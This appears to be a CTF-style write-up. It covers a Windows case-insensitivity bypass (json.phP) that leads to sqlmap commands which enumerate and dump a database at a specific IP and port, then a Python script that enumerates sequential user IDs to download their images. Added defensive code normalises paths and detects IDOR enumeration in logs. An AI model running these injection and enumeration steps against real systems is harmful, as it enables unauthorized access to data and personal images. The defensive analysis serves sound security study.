web

web: could not make sense of it

sqlmap

Straight to shell: Windows is case-insensitive while PHP is case-sensitive, so the check is bypassed and the injection goes through.
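The point above is a canonicalisation mismatch: a filter that compares the path case-sensitively decides that json.phP is not the PHP script, while the case-insensitive filesystem on the Windows host still executes it. The following is an added illustration (not code from the write-up); the host example.test, the sample URLs and the two helper functions are constructed for the demonstration. It shows the naive rule beside one that folds case the way the server does, and lists the spellings the naive rule misses.

```python
from urllib.parse import urlsplit, unquote

# Constructed request URLs for the demonstration (not from the write-up);
# the second one is the json.phP spelling the write-up relies on.
SAMPLE_URLS = [
    "http://example.test/json.php?id=admin",
    "http://example.test/json.phP?id=admin",
    "http://example.test/JSON.PHP?id=admin",
    "http://example.test/index.html",
]


def naive_needs_inspection(url):
    """Decide whether the id parameter must be inspected, using a literal,
    case-sensitive path comparison. A filter written this way assumes the
    web server only executes the exact spelling json.php."""
    return urlsplit(url).path.endswith("/json.php")


def normalized_needs_inspection(url):
    """Same decision, but the path is canonicalised the way a
    case-insensitive filesystem (Windows/NTFS) resolves it: percent-decoded
    and case-folded. json.phP and JSON.PHP then match like json.php does."""
    path = unquote(urlsplit(url).path).lower()
    return path.endswith("/json.php")


def audit(urls):
    """Return the URLs the naive filter would skip although the server would
    still hand them to the PHP handler; an empty list means both rules agree."""
    return [u for u in urls
            if normalized_needs_inspection(u) and not naive_needs_inspection(u)]


if __name__ == "__main__":
    for u in audit(SAMPLE_URLS):
        print("missed by case-sensitive rule:", u)
```

The fix is not a longer blacklist of spellings: the filter has to normalise the path with the same rules the filesystem applies before it matches anything, and the parameter check should apply to every request that reaches the script, whatever the URL looked like.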

Enumerate the databases
sqlmap -u "http://101.71.29.5:10006/json.phP?id=admin" --dbs -p id --thread 10
Find the current database
sqlmap -u "http://101.71.29.5:10006/json.phP?id=admin" --flush -p id --thread 10 --current-db
List the tables
sqlmap -u "http://101.71.29.5:10006/json.phP?id=admin" --flush -p id --thread 10 --current-db -D 5monthweb --tables
Dump the table
sqlmap -u "http://101.71.29.5:10006/json.phP?id=admin" --flush -p id --thread 10 --current-db -D 5monthweb -T article --dump

web: url

Under Python 3.7:

# -*- coding: utf8 -*-
import base64
import json
from urllib import request


def save(strs, uid):
    # Decode the base64 image payload and write it out as <uid>.jpg
    imgdata = base64.b64decode(strs)
    name = str(uid) + ".jpg"
    with open(name, 'wb') as file:
        file.write(imgdata)


def downloadPicture():
    url = r"https://"  # target endpoint left blank in the original write-up
    headers = {
        "Connection": "Keep-Alive",
        "Accept-Encoding": "gzip",
        "User-Agent": "okhttp/3.2.0"
    }
    for id in range(717630, 717640):
        try:
            payload = "funcNo=2000003&userid=" + str(id) + "&op_way=3&op_source=3&infocolect_channel=3"
            payload = payload.encode(encoding='UTF8')
            # the original wrote methmod=, which urllib rejects; the keyword is method=
            r = request.Request(url=url, data=payload, headers=headers, method="POST")
            res = request.urlopen(r)
            jsonData = json.loads(res.read())
            result = jsonData["results"]
            # two images per record; the second is saved as <id>_.jpg
            imgdata = result[0]["img_data"]
            save(imgdata, id)
            imgdata1 = result[1]["img_data"]
            save(imgdata1, str(id) + "_")
            print("ok")
        except Exception:
            print("No")


if __name__ == "__main__":
    downloadPicture()
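The script works only because the endpoint returns whichever userid the caller names, regardless of whose session is making the request; the consecutive ids make the enumeration trivial. As an added example (not part of the write-up), the following detection logic runs over constructed application-log lines modelled on that traffic. The log format, the client addresses and the session_user field are assumptions for the demonstration. It reports two things a defender would alert on: requests for a userid other than the session owner's, and a client walking through consecutive ids.

```python
import json
from collections import defaultdict

# Constructed application-log lines (not from the write-up), modelled on the
# traffic the script above generates: one client fetching several consecutive
# userid values while its session belongs to a single account, plus a normal
# client that only asks for its own record.
LOG_LINES = [
    '{"ts": "2019-06-12T10:01:01", "client": "10.0.0.7", "session_user": 717630, "userid": 717630, "ua": "okhttp/3.2.0"}',
    '{"ts": "2019-06-12T10:01:02", "client": "10.0.0.7", "session_user": 717630, "userid": 717631, "ua": "okhttp/3.2.0"}',
    '{"ts": "2019-06-12T10:01:02", "client": "10.0.0.7", "session_user": 717630, "userid": 717632, "ua": "okhttp/3.2.0"}',
    '{"ts": "2019-06-12T10:01:03", "client": "10.0.0.7", "session_user": 717630, "userid": 717633, "ua": "okhttp/3.2.0"}',
    '{"ts": "2019-06-12T10:01:03", "client": "10.0.0.7", "session_user": 717630, "userid": 717634, "ua": "okhttp/3.2.0"}',
    '{"ts": "2019-06-12T10:01:05", "client": "10.0.0.9", "session_user": 4242, "userid": 4242, "ua": "Mozilla/5.0"}',
    '{"ts": "2019-06-12T10:01:09", "client": "10.0.0.9", "session_user": 4242, "userid": 4242, "ua": "Mozilla/5.0"}',
]


def parse_events(lines):
    """One dict per JSON log line; malformed lines are skipped rather than
    aborting the whole run."""
    events = []
    for line in lines:
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def idor_mismatches(events):
    """Requests whose userid is not the session owner's own id. On a correctly
    authorised endpoint this list is empty, because the server would have
    refused (or ignored) the foreign userid."""
    return [e for e in events if e["userid"] != e["session_user"]]


def sequential_runs(events, min_len=4):
    """Per client, the longest run of strictly consecutive userid values in
    arrival order. Returns {client: run_length} for clients at or above
    min_len; a normal client re-fetching its own record never builds a run."""
    by_client = defaultdict(list)
    for e in events:
        by_client[e["client"]].append(e["userid"])
    flagged = {}
    for client, ids in by_client.items():
        best = run = 1
        for prev, cur in zip(ids, ids[1:]):
            run = run + 1 if cur == prev + 1 else 1
            best = max(best, run)
        if best >= min_len:
            flagged[client] = best
    return flagged


if __name__ == "__main__":
    evs = parse_events(LOG_LINES)
    print("foreign-userid requests:", len(idor_mismatches(evs)))
    print("enumerating clients:", sequential_runs(evs))
```

The first check is the real fix expressed as a query: if the server derived the record from the session instead of trusting the posted userid, idor_mismatches would have nothing to return. The second is a behavioural signal for endpoints that cannot be changed quickly; the min_len threshold trades off noise from clients that legitimately page through a few adjacent records.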
